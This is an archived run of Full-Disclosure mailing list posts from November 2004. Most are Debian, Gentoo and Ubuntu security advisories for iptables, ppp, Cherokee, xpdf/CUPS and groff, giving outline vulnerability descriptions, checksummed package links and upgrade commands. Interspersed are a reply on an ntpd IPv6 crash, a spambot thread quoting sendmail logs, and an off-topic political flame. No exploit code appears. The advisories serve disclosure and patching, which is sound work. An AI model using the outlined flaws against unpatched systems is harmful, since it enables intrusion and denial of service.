    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
      Size/MD5 checksum: 1470270 36c383eec00251183eab2e4cd3add41d
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
      Size/MD5 checksum: 193240 c86d477d0eda07aa9822817933b4413d

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBhluQW5ql+IAeqTIRAjbeAJsGBRyVSvrKZUO9dtjgpzmYnAY4dwCfc299
52DJk5yBb2HmbajeZBcOSew=
=sG2c
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: ntpd segfaults accessing IPv6 hosts

mayergis.net
Date: Mon Nov 01 2004 - 09:30:26 CST

----- Original Message Follows -----
> Hi full-disclosure!
>
> ntpd 1:4.2.0a-11 (as in debian testing/sarge and unstable/sid)
> segfaults when accessing ntp servers on IPv6 hosts. I don't know
> whether this bug is exploitable. But such a server on
> pool.ntp.org might DoS many servers.

There are no IPv6 addresses in pool.ntp.org so there is no risk here.
(dig AAAA pool.ntp.org)

>
> There is a fixed version available.
>

The latest ntp-dev tarball should have the fixes. Currently the
number of ntp servers with IPv6 AAAA records is very low.

> For more details see http://bugzilla.ntp.org/show_bug.cgi?id=353
>
> Bernhard
>

Danny
NTP Development

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [SECURITY] [DSA 580-1] New iptables packages fix modprobe failure

debian-security-announcelists.debian.org
Date: Mon Nov 01 2004 - 10:31:33 CST

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 580-1 securitydebian.org
http://www.debian.org/security/ Martin Schulze
November 1st, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : iptables
Vulnerability : missing initialisation
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2004-0986
Debian Bug : 219686

Faheem Mitha noticed that the iptables command, an administration tool
for IPv4 packet filtering and NAT, did not always load the required
modules on it own as it was supposed to. This could lead to firewall
rules not being loaded on system startup. This caused a failure in
connection with rules provided by lokkit at least.

For the stable distribution (woody) this problem has been fixed in
version 1.2.6a-5.0woody2.

For the unstable distribution (sid) this problem has been fixed in
version 1.2.11-4.

We recommend that you upgrade your iptables package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2.dsc
      Size/MD5 checksum: 639 03ce7ecd0cc462b0b0bef08d400f5a39
    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2.diff.gz
      Size/MD5 checksum: 82136 6c6305ebf8da551d7cbdfc4fe1149d87
    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a.orig.tar.gz
      Size/MD5 checksum: 422313 84aed37b27830c1a74ece6765db0c31c

  Alpha architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_alpha.deb
      Size/MD5 checksum: 377404 4adc7c8e3b71d6732fe36a223d044fc7
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_alpha.deb
      Size/MD5 checksum: 110230 c0e0ecb43614186556adcd714e4d1272

  ARM architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_arm.deb
      Size/MD5 checksum: 314110 8d0b4d2e6d7af1377cccf91898a7bda6
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_arm.deb
      Size/MD5 checksum: 99130 aff30c9fc49fed3c4b21f418b43c4e65

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_i386.deb
      Size/MD5 checksum: 287114 b0ff0f6ab787a136d7ef6f8819b04f96
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_i386.deb
      Size/MD5 checksum: 96442 1c2d7ec853da4fdca2ca4e5bddd6740f

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_ia64.deb
      Size/MD5 checksum: 446814 e9ea93b92e97a66164411be155b93598
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_ia64.deb
      Size/MD5 checksum: 116386 42deb79a474dd9d78bddfe723b4ee6c4

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_hppa.deb
      Size/MD5 checksum: 345212 4866e88ca61f8ac2778cc3ce44d142ac
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_hppa.deb
      Size/MD5 checksum: 95430 c60ef8c05e0c238d8ac7682626f3972d

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_m68k.deb
      Size/MD5 checksum: 289032 f7748d7e5cc9726b7142d918712abd6d
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_m68k.deb
      Size/MD5 checksum: 91232 37e6e304f0b4ebf666c4ffc860253a73

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_mips.deb
      Size/MD5 checksum: 326050 713a2efd308c98a3a48135664c7a385c
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_mips.deb
      Size/MD5 checksum: 106754 f44458bc89644ddb91a63caa498456ad

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_mipsel.deb
      Size/MD5 checksum: 327082 731e9de4f81d6ecc114c89b2c54e99c7
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_mipsel.deb
      Size/MD5 checksum: 106898 25d89525b8d158f12eaaf2db6635fd14

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_powerpc.deb
      Size/MD5 checksum: 321422 a73bf7a5f4696a44abe4dc19d9508cc8
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_powerpc.deb
      Size/MD5 checksum: 101350 e81ceac78d6a38cfdd6b8f09e0cb176e

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_s390.deb
      Size/MD5 checksum: 307826 1092ceb008461ac0323b2ddfc2327c22
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_s390.deb
      Size/MD5 checksum: 97020 c5079802be1fed9934527371cf6a99d8

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_sparc.deb
      Size/MD5 checksum: 323322 b33b11c7b474c50a84087f99580c122c
    http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_sparc.deb
      Size/MD5 checksum: 98876 dc0ed1d555df1abb1868514fa307a88c

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBhmTlW5ql+IAeqTIRAhjTAKCH0M8Oz0a5MAXA3NZzk3FufsHzAQCZASWi
cE4GcVBtJ3eVv3jEUr14OeQ=
=agdX
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200411-01 ] ppp: Remote denial of service vulnerability

From: Luke Macken (lewkgentoo.org)
Date: Mon Nov 01 2004 - 11:21:51 CST

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200411-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: ppp: Remote denial of service vulnerability
      Date: November 01, 2004
      Bugs: #69152
        ID: 200411-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

pppd contains a vulnerability that may allow an attacker to crash the
server.

Background
==========

ppp is a Unix implementation of the Point-to-Point Protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-dialup/ppp < 2.4.2-r7 >= 2.4.2-r7

Description
===========

The pppd server improperly verifies header fields, making it vulnerable
to denial of service attacks.

Impact
======

An attacker can cause the pppd server to access memory that it isn't
allowed to, causing the server to crash. No code execution is possible
with this vulnerability, because no data is getting copied.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ppp users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-dialup/ppp-2.4.2-r7"

References
==========

  [ 1 ] BugTraq Advisory
        http://www.securityfocus.com/archive/1/379450

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200411-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBhnCvRsm3eDkOu7kRAhBbAJ9ceVpC31fsgQwDVqxVVvDH6AHD3wCeO7oi
DA8Xg5r7lWK66546vid99o0=
=Lg20
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [USN-14-1] xpdf vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Mon Nov 01 2004 - 11:33:42 CST

===========================================================
Ubuntu Security Notice 14-1 November 1, 2004
xpdf vulnerabilities
CAN-2004-0888, CAN-2004-0889
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

xpdf-reader
xpdf-utils
cupsys
tetex-bin

The problem can be corrected by upgrading the affected package(s) to
version 1.1.20final+cvs20040330-4ubuntu16.2 (cupsys), version
3.00-8ubuntu1.2 (xpdf-reader, xpdf-utils), or version
2.0.2-21ubuntu0.2 (tetex-bin). In general, a standard system upgrade
is sufficient to effect the necessary changes.

Details follow:

Markus Meissner discovered even more integer overflow vulnerabilities
in xpdf, a viewer for PDF files. These integer overflows can
eventually lead to buffer overflows.

The Common UNIX Printing System (CUPS) uses the same code to print PDF
files; tetex-bin uses the code to generate PDF output and process
included PDF files. In any case, these vulnerabilities could be
exploited by an attacker providing a specially crafted PDF file which,
when processed by CUPS, xpdf, or pdflatex, could result in abnormal
program termination or the execution of program code supplied by the
attacker.

In the case of CUPS, this bug could be exploited to gain the privileges of
the CUPS print server (by default, user cupsys).

In the cases of xpdf and pdflatex, this bug could be exploited to gain
the privileges of the user invoking the program.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2.diff.gz
      Size/MD5: 1349183 2a9af09fb2281cc7d8b33a7cbe787c1e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2.dsc
      Size/MD5: 867 0b814f95ca945f00b994b85b21529ed0
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330.orig.tar.gz
      Size/MD5: 5645146 5eb5983a71b26e4af841c26703fc2f79
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2.diff.gz
      Size/MD5: 110942 d3656e1ce48c5b76d2c4a2e419e46af2
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2.dsc
      Size/MD5: 1062 cf4f5d0938cfe9067c9659ff81446798
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2.orig.tar.gz
      Size/MD5: 11677169 8f02d5940bf02072ce5fe05429c90e63
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-8ubuntu1.2.diff.gz
      Size/MD5: 47228 aecaab970f7a93ff0aa6eabeab2d8c84
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-8ubuntu1.2.dsc
      Size/MD5: 788 79e1a5984f2603684ab96e56d2bfb87d
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00.orig.tar.gz
      Size/MD5: 534697 95294cef3031dd68e65f331e8750b2c2

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-common_3.00-8ubuntu1.2_all.deb
      Size/MD5: 56176 01178c68df7b149fce48a4c402b5f96d
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-8ubuntu1.2_all.deb
      Size/MD5: 1272 8c7d1abd4f790ed93d5f58e3052de6b0

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
      Size/MD5: 58096 ac0101e69dd47329ea063a5b4537402a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
      Size/MD5: 105948 88defb355b823d487cd7a03dc428d3e3
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
      Size/MD5: 3613942 c0b7985c971ba193b8124bf5c69c13f2
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
      Size/MD5: 61724 ddc259225e40fc2e2fa963df3bd55582
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
      Size/MD5: 52388 e826f2b159ea716f594bcf8c5cad9a2d
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
      Size/MD5: 100826 29525bf26d559b76d5dfe16662353308
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
      Size/MD5: 73910 1ea1c865abf1a9973620d66858306652
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.2_amd64.deb
      Size/MD5: 72744 135f2379dd167e61de064be723dba23c
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.2_amd64.deb
      Size/MD5: 59926 39b8460a7d86e1ad28cfd6b5bbfb27d4
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2_amd64.deb
      Size/MD5: 4327706 f94e137f5fa9aa0cc5b2f60a559af861
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-reader_3.00-8ubuntu1.2_amd64.deb
      Size/MD5: 666694 4f1aa4a202484f10305d3469db754a3f
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-utils_3.00-8ubuntu1.2_amd64.deb
      Size/MD5: 1270778 4722054b11da6c2bebfb61287423f32b

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
      Size/MD5: 57442 2781ff2d7c97b109de7cbc9d88a62cd7
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
      Size/MD5: 103832 f5d421595e723e49dff5bce567057ced
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
      Size/MD5: 3602424 d5b8b43a814af86a83aa5e91c6308dcc
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
      Size/MD5: 61292 3dfd72714a5afb053de5a2ce0b28d266
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
      Size/MD5: 51960 688bfed1ff18c11c34bdac8f7c68846a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
      Size/MD5: 97530 61356952dd9267eedbc9ee6c27147003
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
      Size/MD5: 71172 613ab789243b600cc4b5442f30c106fa
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.2_i386.deb
      Size/MD5: 64830 61293e557d6f0fad07244412917f1053
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.2_i386.deb
      Size/MD5: 56326 743b2cae54cfbfb38cfbbdb3b4037c53
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2_i386.deb
      Size/MD5: 3812462 196509178e258629483368f89b3a380f
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-reader_3.00-8ubuntu1.2_i386.deb
      Size/MD5: 631510 22bdbe4b6e1669e632f3ff7a4462d80d
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-utils_3.00-8ubuntu1.2_i386.deb
      Size/MD5: 1192886 1bf8406a9a11e1cde44101edecf07446

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
      Size/MD5: 62050 0d94667a4a5ec4b07d4b3af1cad43a1a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
      Size/MD5: 113636 3dfdef5696f579e9f5faf8589c607b78
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
      Size/MD5: 3632952 7ab065c5ec821c39fc10ea10e3983d27
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
      Size/MD5: 60918 8bc8293f67f4e1a94772dbb29a919634
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
      Size/MD5: 54614 4cafe7af9dcedb199b23e50e059b130f
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
      Size/MD5: 100214 48a662bb07c036cacc50a3e462382cfc
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
      Size/MD5: 74016 83a562bfb37100d1b6f2e107dd7ea09b
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.2_powerpc.deb
      Size/MD5: 74898 b3da7cccc2b9158cf9e76d656ebfc140
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.2_powerpc.deb
      Size/MD5: 61268 8021461b6861cfabc6fdeebc094e7241
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2_powerpc.deb
      Size/MD5: 4350430 04d2aeb65e2ce086f31f71a8ba37a5f0
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-reader_3.00-8ubuntu1.2_powerpc.deb
      Size/MD5: 692700 ea37a0a274161869ede9f9787f35c726
    http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-utils_3.00-8ubuntu1.2_powerpc.deb
      Size/MD5: 1310526 9d50c892a6c0452e166e93a825920738

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBhnN2DecnbV4Fd/IRAj+DAJ9BUwS7yUiZte80FhSmHr7rEglo1ACgzYkE
blhjjwYpEweLqPTcA+9PwAk=
=lkIJ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [USN-13-1] groff utility vulnerability

From: Martin Pitt (martin.pittcanonical.com)
Date: Mon Nov 01 2004 - 11:24:40 CST

===========================================================
Ubuntu Security Notice USN-13-1 November 1, 2004
groff utility vulnerability
CAN-2004-0969
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

groff

The problem can be corrected by upgrading the affected package to
version 1.18.1.1-1ubuntu0.1. In general, a standard system upgrade
is sufficient to effect the necessary changes.

Details follow:

Recently, Trustix Secure Linux discovered a vulnerability in the groff
package. The utility "groffer" created a temporary directory in an
insecure way, which allowed exploitation of a race condition to create
or overwrite files with the privileges of the user invoking the
program.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1.diff.gz
      Size/MD5: 122858 a92b7aa4bc54084f4b23b5b9e5ac3c93
    http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1.dsc
      Size/MD5: 715 43ca684c0d8f9043bbe1379b8f974775
    http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1.orig.tar.gz
      Size/MD5: 2260623 511dbd64b67548c99805f1521f82cc5e

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff-base_1.18.1.1-1ubuntu0.1_amd64.deb
      Size/MD5: 856182 2cd0d31b4bff4b82cffb7a908b505e9b
    http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1_amd64.deb
      Size/MD5: 1889974 32f2d724e153d7fcf0674dadf5a7ed09

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff-base_1.18.1.1-1ubuntu0.1_i386.deb
      Size/MD5: 807494 58587e715f46456b8835e1a2e79e99a6
    http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1_i386.deb
      Size/MD5: 1843024 5361659b8437d45e3d1d64be03269c8d

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff-base_1.18.1.1-1ubuntu0.1_powerpc.deb
      Size/MD5: 860482 068d0a03621f0194cc518b6c0bc8d7b4
    http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1_powerpc.deb
      Size/MD5: 1885040 ab4b353bac496dc2ef4d2873bbbc67a2

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBhnFYDecnbV4Fd/IRAkfsAJ9TemWgN3C5yoPYr3Yjm9BGsx4cTACfRpZ9
ZJ09W+Et8J4H4CFO5OOB/ZU=
=BAZU
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200411-02 ] Cherokee: Format string vulnerability

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Mon Nov 01 2004 - 12:05:19 CST

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200411-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Cherokee: Format string vulnerability
      Date: November 01, 2004
      Bugs: #67667
        ID: 200411-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Cherokee contains a format string vulnerability that could lead to
denial of service or the execution of arbitary code.

Background
==========

Cherokee is an extra-light web server.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 www-servers/cherokee <= 0.4.17 >= 0.4.17.1

Description
===========

Florian Schilhabel from the Gentoo Linux Security Audit Team found a
format string vulnerability in the cherokee_logger_ncsa_write_string()
function.

Impact
======

Using a specially crafted URL when authenticating via auth_pam, a
malicious user may be able to crash the server or execute arbitrary
code on the target machine with permissions of the user running
Cherokee.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Cherokee users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/cherokee-0.4.17.1"

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200411-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBhnrizKC5hMHO6rkRAtC3AJ9CR09GcfkJKtESG1Df/qELoVPYhwCfb6gn
0htO7/qd9VGO5WHss/DQzew=
=I8fR
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

From: Barry Fitzgerald (bkfsecsdf.lonestar.org)
Date: Mon Nov 01 2004 - 12:36:18 CST

Paul Schmehl wrote:

>
>
> Now, PLEASE keep the damn politics off this list, because I assure
> you, I will not sit idly by and allow this kind of unadulterated crap
> to be spewed on this list without responding.
>
> All replies to /dev/null.
>
That's kind of contradictory, wouldn't you say? First you'll respond
to... everything... and then all replies are being filtered into the bit
bucket... very odd.

Seriously, creationist, don't you every just shut the hell up?

             -Barry

p.s. As an aside, I love it when people trumpet wars for the
sovereignty of nations and then argue that any nation (France and
Germany) that chooses not to go along with us on our crusade was
violating some unwritten rule that said they always had to blindly back
our decisions... that's some concept of sovereignty there...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [SPAM] [Full-Disclosure] Spam sent via spambots?

From: James Riden (j.ridenmassey.ac.nz)
Date: Mon Nov 01 2004 - 13:33:21 CST

Hugo van der Kooij <hvdkooijvanderkooij.org> writes:

> Sendmail logs also show a significant number of false recipients which
> are known to be part of worms that are by now over 6 months old. Like:
>
> Nov 1 07:16:06 gandalf sendmail[17575]: iA16G3QU017575: ruleset=check_rcpt, arg1=<maryvanderkooij.org>, relay=[221.232.95.12], reject=550 5.7.0 <maryvanderkooij.org>... - REJECTED: KEEP YOUR VIRUS JUNK!; SEE ALSO: http://hvdkooij.xs4all.nl/email.cms
> Nov 1 07:16:07 gandalf sendmail[17575]: iA16G3QU017575: lost input channel from [221.232.95.12] to MTA after rcpt
> Nov 1 07:16:07 gandalf sendmail[17575]: iA16G3QU017575: from=<mariatencent.com>, size=0, class=0, nrcpts=0, proto=ESMTP, daemon=MTA, relay=[221.232.95.12]
>
> If there are that many worms going around it only shows how easy it is to
> write your own little SMTP engine. Spammers may have deployed similar
> backdoors/trojans/bots/...

A lot of stuff out there will also HELO as <yourdomain>, or the IP
address of your MX. I'm pretty sure it's a worm, because I can't think
how any MTA/MUA could be that broken.

--
James Riden / j.ridenmassey.ac.nz / Systems Security Engineer
Information Technology Services, Massey University, NZ.
GPG public key available at: http://www.massey.ac.nz/~jriden/

_______________________________________________
Full-Disclosure - We believe in it.
